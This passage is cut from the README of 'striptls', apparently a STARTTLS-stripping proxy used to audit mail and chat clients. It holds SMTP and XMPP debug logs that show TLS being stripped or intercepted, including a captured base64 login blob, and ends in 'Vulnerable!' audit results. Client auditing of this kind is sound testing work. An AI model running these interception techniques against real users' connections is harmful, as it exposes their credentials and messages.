[xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250 STARTTLS\\r\\n'\n\t- DEBUG - \u003cSession 0x1f46990\u003e [client] =\u003e [server] 'STARTTLS\\r\\n'\n\t- DEBUG - \u003cSession 0x1f46990\u003e [client] \u003c= [server][mangled] '220 Go ahead\\r\\n'\n\t- DEBUG - \u003cSession 0x1f46990\u003e [client] \u003c= [server][mangled] waiting for inbound SSL Handshake\n\t- DEBUG - \u003cSession 0x1f46990\u003e [client] =\u003e [server] 'STARTTLS\\r\\n'\n\t- DEBUG - \u003cSession 0x1f46990\u003e [client] =\u003e [server][mangled] performing outbound SSL handshake\n\t- DEBUG - \u003cSession 0x1f46990\u003e [client] =\u003e [server][mangled] None\n\t- DEBUG - \u003cSession 0x1f46990\u003e [client] =\u003e [server] 'ehlo [192.168.139.1]\\r\\n'\n\t- DEBUG - \u003cSession 0x1f46990\u003e [client] \u003c= [server] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 69920427\\r\\n250 AUTH LOGIN PLAIN\\r\\n'\n\t- DEBUG - \u003cSession 0x1f46990\u003e [client] =\u003e [server] 'mail FROM:\u003ca@b.com\u003e size=10\\r\\n'\n\t- DEBUG - \u003cSession 0x1f46990\u003e [client] \u003c= [server] '530 Authentication required\\r\\n'\n\t- DEBUG - \u003cSession 0x1f46990\u003e [client] =\u003e [server] 'rset\\r\\n'\n\t- DEBUG - \u003cSession 0x1f46990\u003e [client] \u003c= [server] '250 OK\\r\\n'\n\t- WARNING - \u003cSession 0x1f46990\u003e terminated.\n\n\n### XMPP Audit Trail\n\nExample: Pidgin with optional transport security.\n\n#### XMPP.StripInboundTLS - Inbound Plain - Outbound TLS - in case server requires starttls\n\n python striptls --listen 0.0.0.0:5222 --remote jabber.ccc.de:5222 -k ../server.pem\n - INFO - \u003cProxy 0x7f08322ba310 listen=('0.0.0.0', 5222) target=('jabber.ccc.de', 5222)\u003e ready.\n ...\n - DEBUG - \u003cProtocolDetect 0x7f083196a810 protocol_id=PROTO_XMPP len_history=0\u003e - protocol detected (target port)\n ...\n - INFO - \u003cSession 0x7f083196a7d0\u003e client ('192.168.139.1', 56888) has connected\n - INFO - \u003cSession 0x7f083196a7d0\u003e connecting to target ('jabber.ccc.de', 5222)\n - DEBUG - \u003cSession 0x7f083196a7d0\u003e [client] =\u003e [server] \"\u003c?xml version='1.0' ?\u003e\u003cstream:stream to='jabber.ccc.de' xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' version='1.0'\u003e\"\n - DEBUG - \u003cRewriteDispatcher - changed mangle: striptls.StripInboundTLS new: True\u003e\n - DEBUG - \u003cSession 0x7f083196a7d0\u003e [client] \u003c= [server] \"\u003c?xml version='1.0'?\u003e\u003cstream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='13821701589972978594' from='jabber.ccc.de' version='1.0' xml:lang='en'\u003e\"\n - DEBUG - \u003cSession 0x7f083196a7d0\u003e [client] \u003c= [server] \"\u003cstream:features\u003e\u003cc xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/\u003e\u003cstarttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'\u003e\u003crequired/\u003e\u003c/starttls\u003e\u003c/stream:features\u003e\"\n - DEBUG - \u003cSession 0x7f083196a7d0\u003e [client] =\u003e [server][mangled] \"\u003cstarttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/\u003e\"\n - DEBUG - \u003cSession 0x7f083196a7d0\u003e [client] =\u003e [server][mangled] performing outbound SSL handshake\n - DEBUG - \u003cSession 0x7f083196a7d0\u003e [client] \u003c= [server][mangled] \"\u003cstream:features\u003e\u003cc xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/\u003e\u003c/stream:features\u003e\"\n - DEBUG - \u003cSession 0x7f083196a7d0\u003e [client] =\u003e [server] \"\u003ciq type='get' id='purple9f914f80'\u003e\u003cquery xmlns='jabber:iq:auth'\u003e\u003cusername\u003etin\u003c/username\u003e\u003c/query\u003e\u003c/iq\u003e\"\n - DEBUG - \u003cSession 0x7f083196a7d0\u003e [client] \u003c= [server] \"\u003c?xml version='1.0'?\u003e\u003cstream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='13515446948282835507' from='jabber.ccc.de' xml:lang='en'\u003e\"\n - DEBUG - \u003cSession 0x7f083196a7d0\u003e [client] \u003c= [server] \"\u003cstream:error\u003e\u003cinvalid-namespace xmlns='urn:ietf:params:xml:ns:xmpp-streams'\u003e\u003c/invalid-namespace\u003e\u003c/stream:error\u003e\"\n - DEBUG - \u003cSession 0x7f083196a7d0\u003e [client] \u003c= [server] '\u003c/stream:stream\u003e'\n - WARNING - \u003cSession 0x7f083196a7d0\u003e terminated.\n\n#### XMPP.StripFromCapabilities - strip starttls server annoucement\n\n - DEBUG - \u003cProtocolDetect 0x7f083196a990 protocol_id=PROTO_XMPP len_history=0\u003e - protocol detected (target port)\n - INFO - \u003cSession 0x7f083196a910\u003e client ('192.168.139.1', 56890) has connected\n - INFO - \u003cSession 0x7f083196a910\u003e connecting to target ('jabber.ccc.de', 5222)\n - DEBUG - \u003cSession 0x7f083196a910\u003e [client] =\u003e [server] \"\u003c?xml version='1.0' ?\u003e\u003cstream:stream to='jabber.ccc.de' xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' version='1.0'\u003e\"\n - DEBUG - \u003cRewriteDispatcher - changed mangle: striptls.StripFromCapabilities new: True\u003e\n - DEBUG - \u003cSession 0x7f083196a910\u003e [client] \u003c= [server] \"\u003c?xml version='1.0'?\u003e\u003cstream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='12381525525258986322' from='jabber.ccc.de' version='1.0' xml:lang='en'\u003e\"\n - DEBUG - \u003cSession 0x7f083196a910\u003e [client] \u003c= [server] \"\u003cstream:features\u003e\u003cc xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/\u003e\u003cstarttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'\u003e\u003crequired/\u003e\u003c/starttls\u003e\u003c/stream:features\u003e\"\n - DEBUG - \u003cSession 0x7f083196a910\u003e [client] \u003c= [server][mangled] \"\u003cstream:features\u003e\u003cc xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/\u003e\u003c/stream:features\u003e\"\n - DEBUG - \u003cSession 0x7f083196a910\u003e [client] =\u003e [server] \"\u003ciq type='get' id='purplecfe2ee07'\u003e\u003cquery xmlns='jabber:iq:auth'\u003e\u003cusername\u003etin\u003c/username\u003e\u003c/query\u003e\u003c/iq\u003e\"\n - DEBUG - \u003cSession 0x7f083196a910\u003e [client] \u003c= [server] \"\u003cstream:error\u003e\u003cpolicy-violation xmlns='urn:ietf:params:xml:ns:xmpp-streams'\u003e\u003c/policy-violation\u003e\u003ctext xml:lang='' xmlns='urn:ietf:params:xml:ns:xmpp-streams'\u003eUse of STARTTLS required\u003c/text\u003e\u003c/stream:error\u003e\u003c/stream:stream\u003e\"\n - WARNING - \u003cSession 0x7f083196a910\u003e terminated.\n\n#### XMPP.StripUntrustedIntercept - TLS Interception inbound and outbound with own certificate/key\n\n - DEBUG - \u003cProtocolDetect 0x7f083196aa90 protocol_id=PROTO_XMPP len_history=0\u003e - protocol detected (target port)\n - INFO - \u003cSession 0x7f083196a8d0\u003e client ('192.168.139.1', 56892) has connected\n - INFO - \u003cSession 0x7f083196a8d0\u003e connecting to target ('jabber.ccc.de', 5222)\n - DEBUG - \u003cSession 0x7f083196a8d0\u003e [client] =\u003e [server] \"\u003c?xml version='1.0' ?\u003e\u003cstream:stream to='jabber.ccc.de' xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' version='1.0'\u003e\"\n - DEBUG - \u003cRewriteDispatcher - changed mangle: striptls.UntrustedIntercept new: True\u003e\n - DEBUG - \u003cSession 0x7f083196a8d0\u003e [client] \u003c= [server] \"\u003c?xml version='1.0'?\u003e\u003cstream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='10051743579572304948' from='jabber.ccc.de' version='1.0' xml:lang='en'\u003e\u003cstream:features\u003e\u003cc xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/\u003e\u003cstarttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'\u003e\u003crequired/\u003e\u003c/starttls\u003e\u003c/stream:features\u003e\"\n - DEBUG - \u003cSession 0x7f083196a8d0\u003e [client] =\u003e [server] \"\u003cstarttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/\u003e\"\n - DEBUG - \u003cSession 0x7f083196a8d0\u003e [client] \u003c= [server][mangled] \"\u003cproceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/\u003e\"\n - DEBUG - \u003cSession 0x7f083196a8d0\u003e [client] \u003c= [server][mangled] waiting for inbound SSL Handshake\n - DEBUG - \u003cSession 0x7f083196a8d0\u003e [client] =\u003e [server] \"\u003cstarttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/\u003e\"\n - DEBUG - \u003cSession 0x7f083196a8d0\u003e [client] =\u003e [server][mangled] performing outbound SSL handshake\n - DEBUG - \u003cSession 0x7f083196a8d0\u003e [client] =\u003e [server][mangled] None\n - DEBUG - \u003cSession 0x7f083196a8d0\u003e [client] =\u003e [server] '\u003c'\n - DEBUG - \u003cSession 0x7f083196a8d0\u003e [client] =\u003e [server] \"stream:stream to='jabber.ccc.de' xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' version='1.0'\u003e\"\n - DEBUG - \u003cSession 0x7f083196a8d0\u003e [client] \u003c= [server] \"\u003c?xml version='1.0'?\u003e\u003cstream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='6938642107398534259' from='jabber.ccc.de' version='1.0' xml:lang='en'\u003e\"\n - DEBUG - \u003cSession 0x7f083196a8d0\u003e [client] \u003c= [server] \"\u003cstream:features\u003e\u003cc xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/\u003e\u003cregister xmlns='http://jabber.org/features/iq-register'/\u003e\u003cmechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'\u003e\u003cmechanism\u003ePLAIN\u003c/mechanism\u003e\u003cmechanism\u003eX-OAUTH2\u003c/mechanism\u003e\u003cmechanism\u003eSCRAM-SHA-1\u003c/mechanism\u003e\u003c/mechanisms\u003e\u003c/stream:features\u003e\"\n - DEBUG - \u003cSession 0x7f083196a8d0\u003e [client] =\u003e [server] '\u003c'\n - DEBUG - \u003cSession 0x7f083196a8d0\u003e [client] =\u003e [server] \"auth xmlns='urn:ietf:params:xml:ns:xmpp-sasl' mechanism='PLAIN' xmlns:ga='http://www.google.com/talk/protocol/auth' ga:client-uses-full-bind-result='true'\u003eAHRpbgB4eA==\u003c/auth\u003e\"\n - DEBUG - \u003cSession 0x7f083196a8d0\u003e [client] \u003c= [server] \"\u003cfailure xmlns='urn:ietf:params:xml:ns:xmpp-sasl'\u003e\u003cnot-authorized/\u003e\u003c/failure\u003e\"\n - DEBUG - \u003cSession 0x7f083196a8d0\u003e [client] =\u003e [server] '\u003c'\n - DEBUG - \u003cSession 0x7f083196a8d0\u003e [client] =\u003e [server] '/stream:stream\u003e'\n - WARNING - \u003cSession 0x7f083196a8d0\u003e terminated.\n\n#### XMPP Audit results\n\n - WARNING - Ctrl C - Stopping server\n - INFO - -- audit results --\n - INFO - [*] client: 192.168.139.1\n - INFO - [Vulnerable!] \u003cclass striptls.StripInboundTLS at 0x7f08319a6808\u003e\n - INFO - [Vulnerable!] \u003cclass striptls.StripFromCapabilities at 0x7f08319a67a0\u003e\n - INFO - [Vulnerable!] \u003cclass striptls.UntrustedIntercept at 0x7f08319a6870\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftintinweb%2Fstriptls","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftintinweb%2Fstriptls","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftintinweb%2Fstriptls/lists"}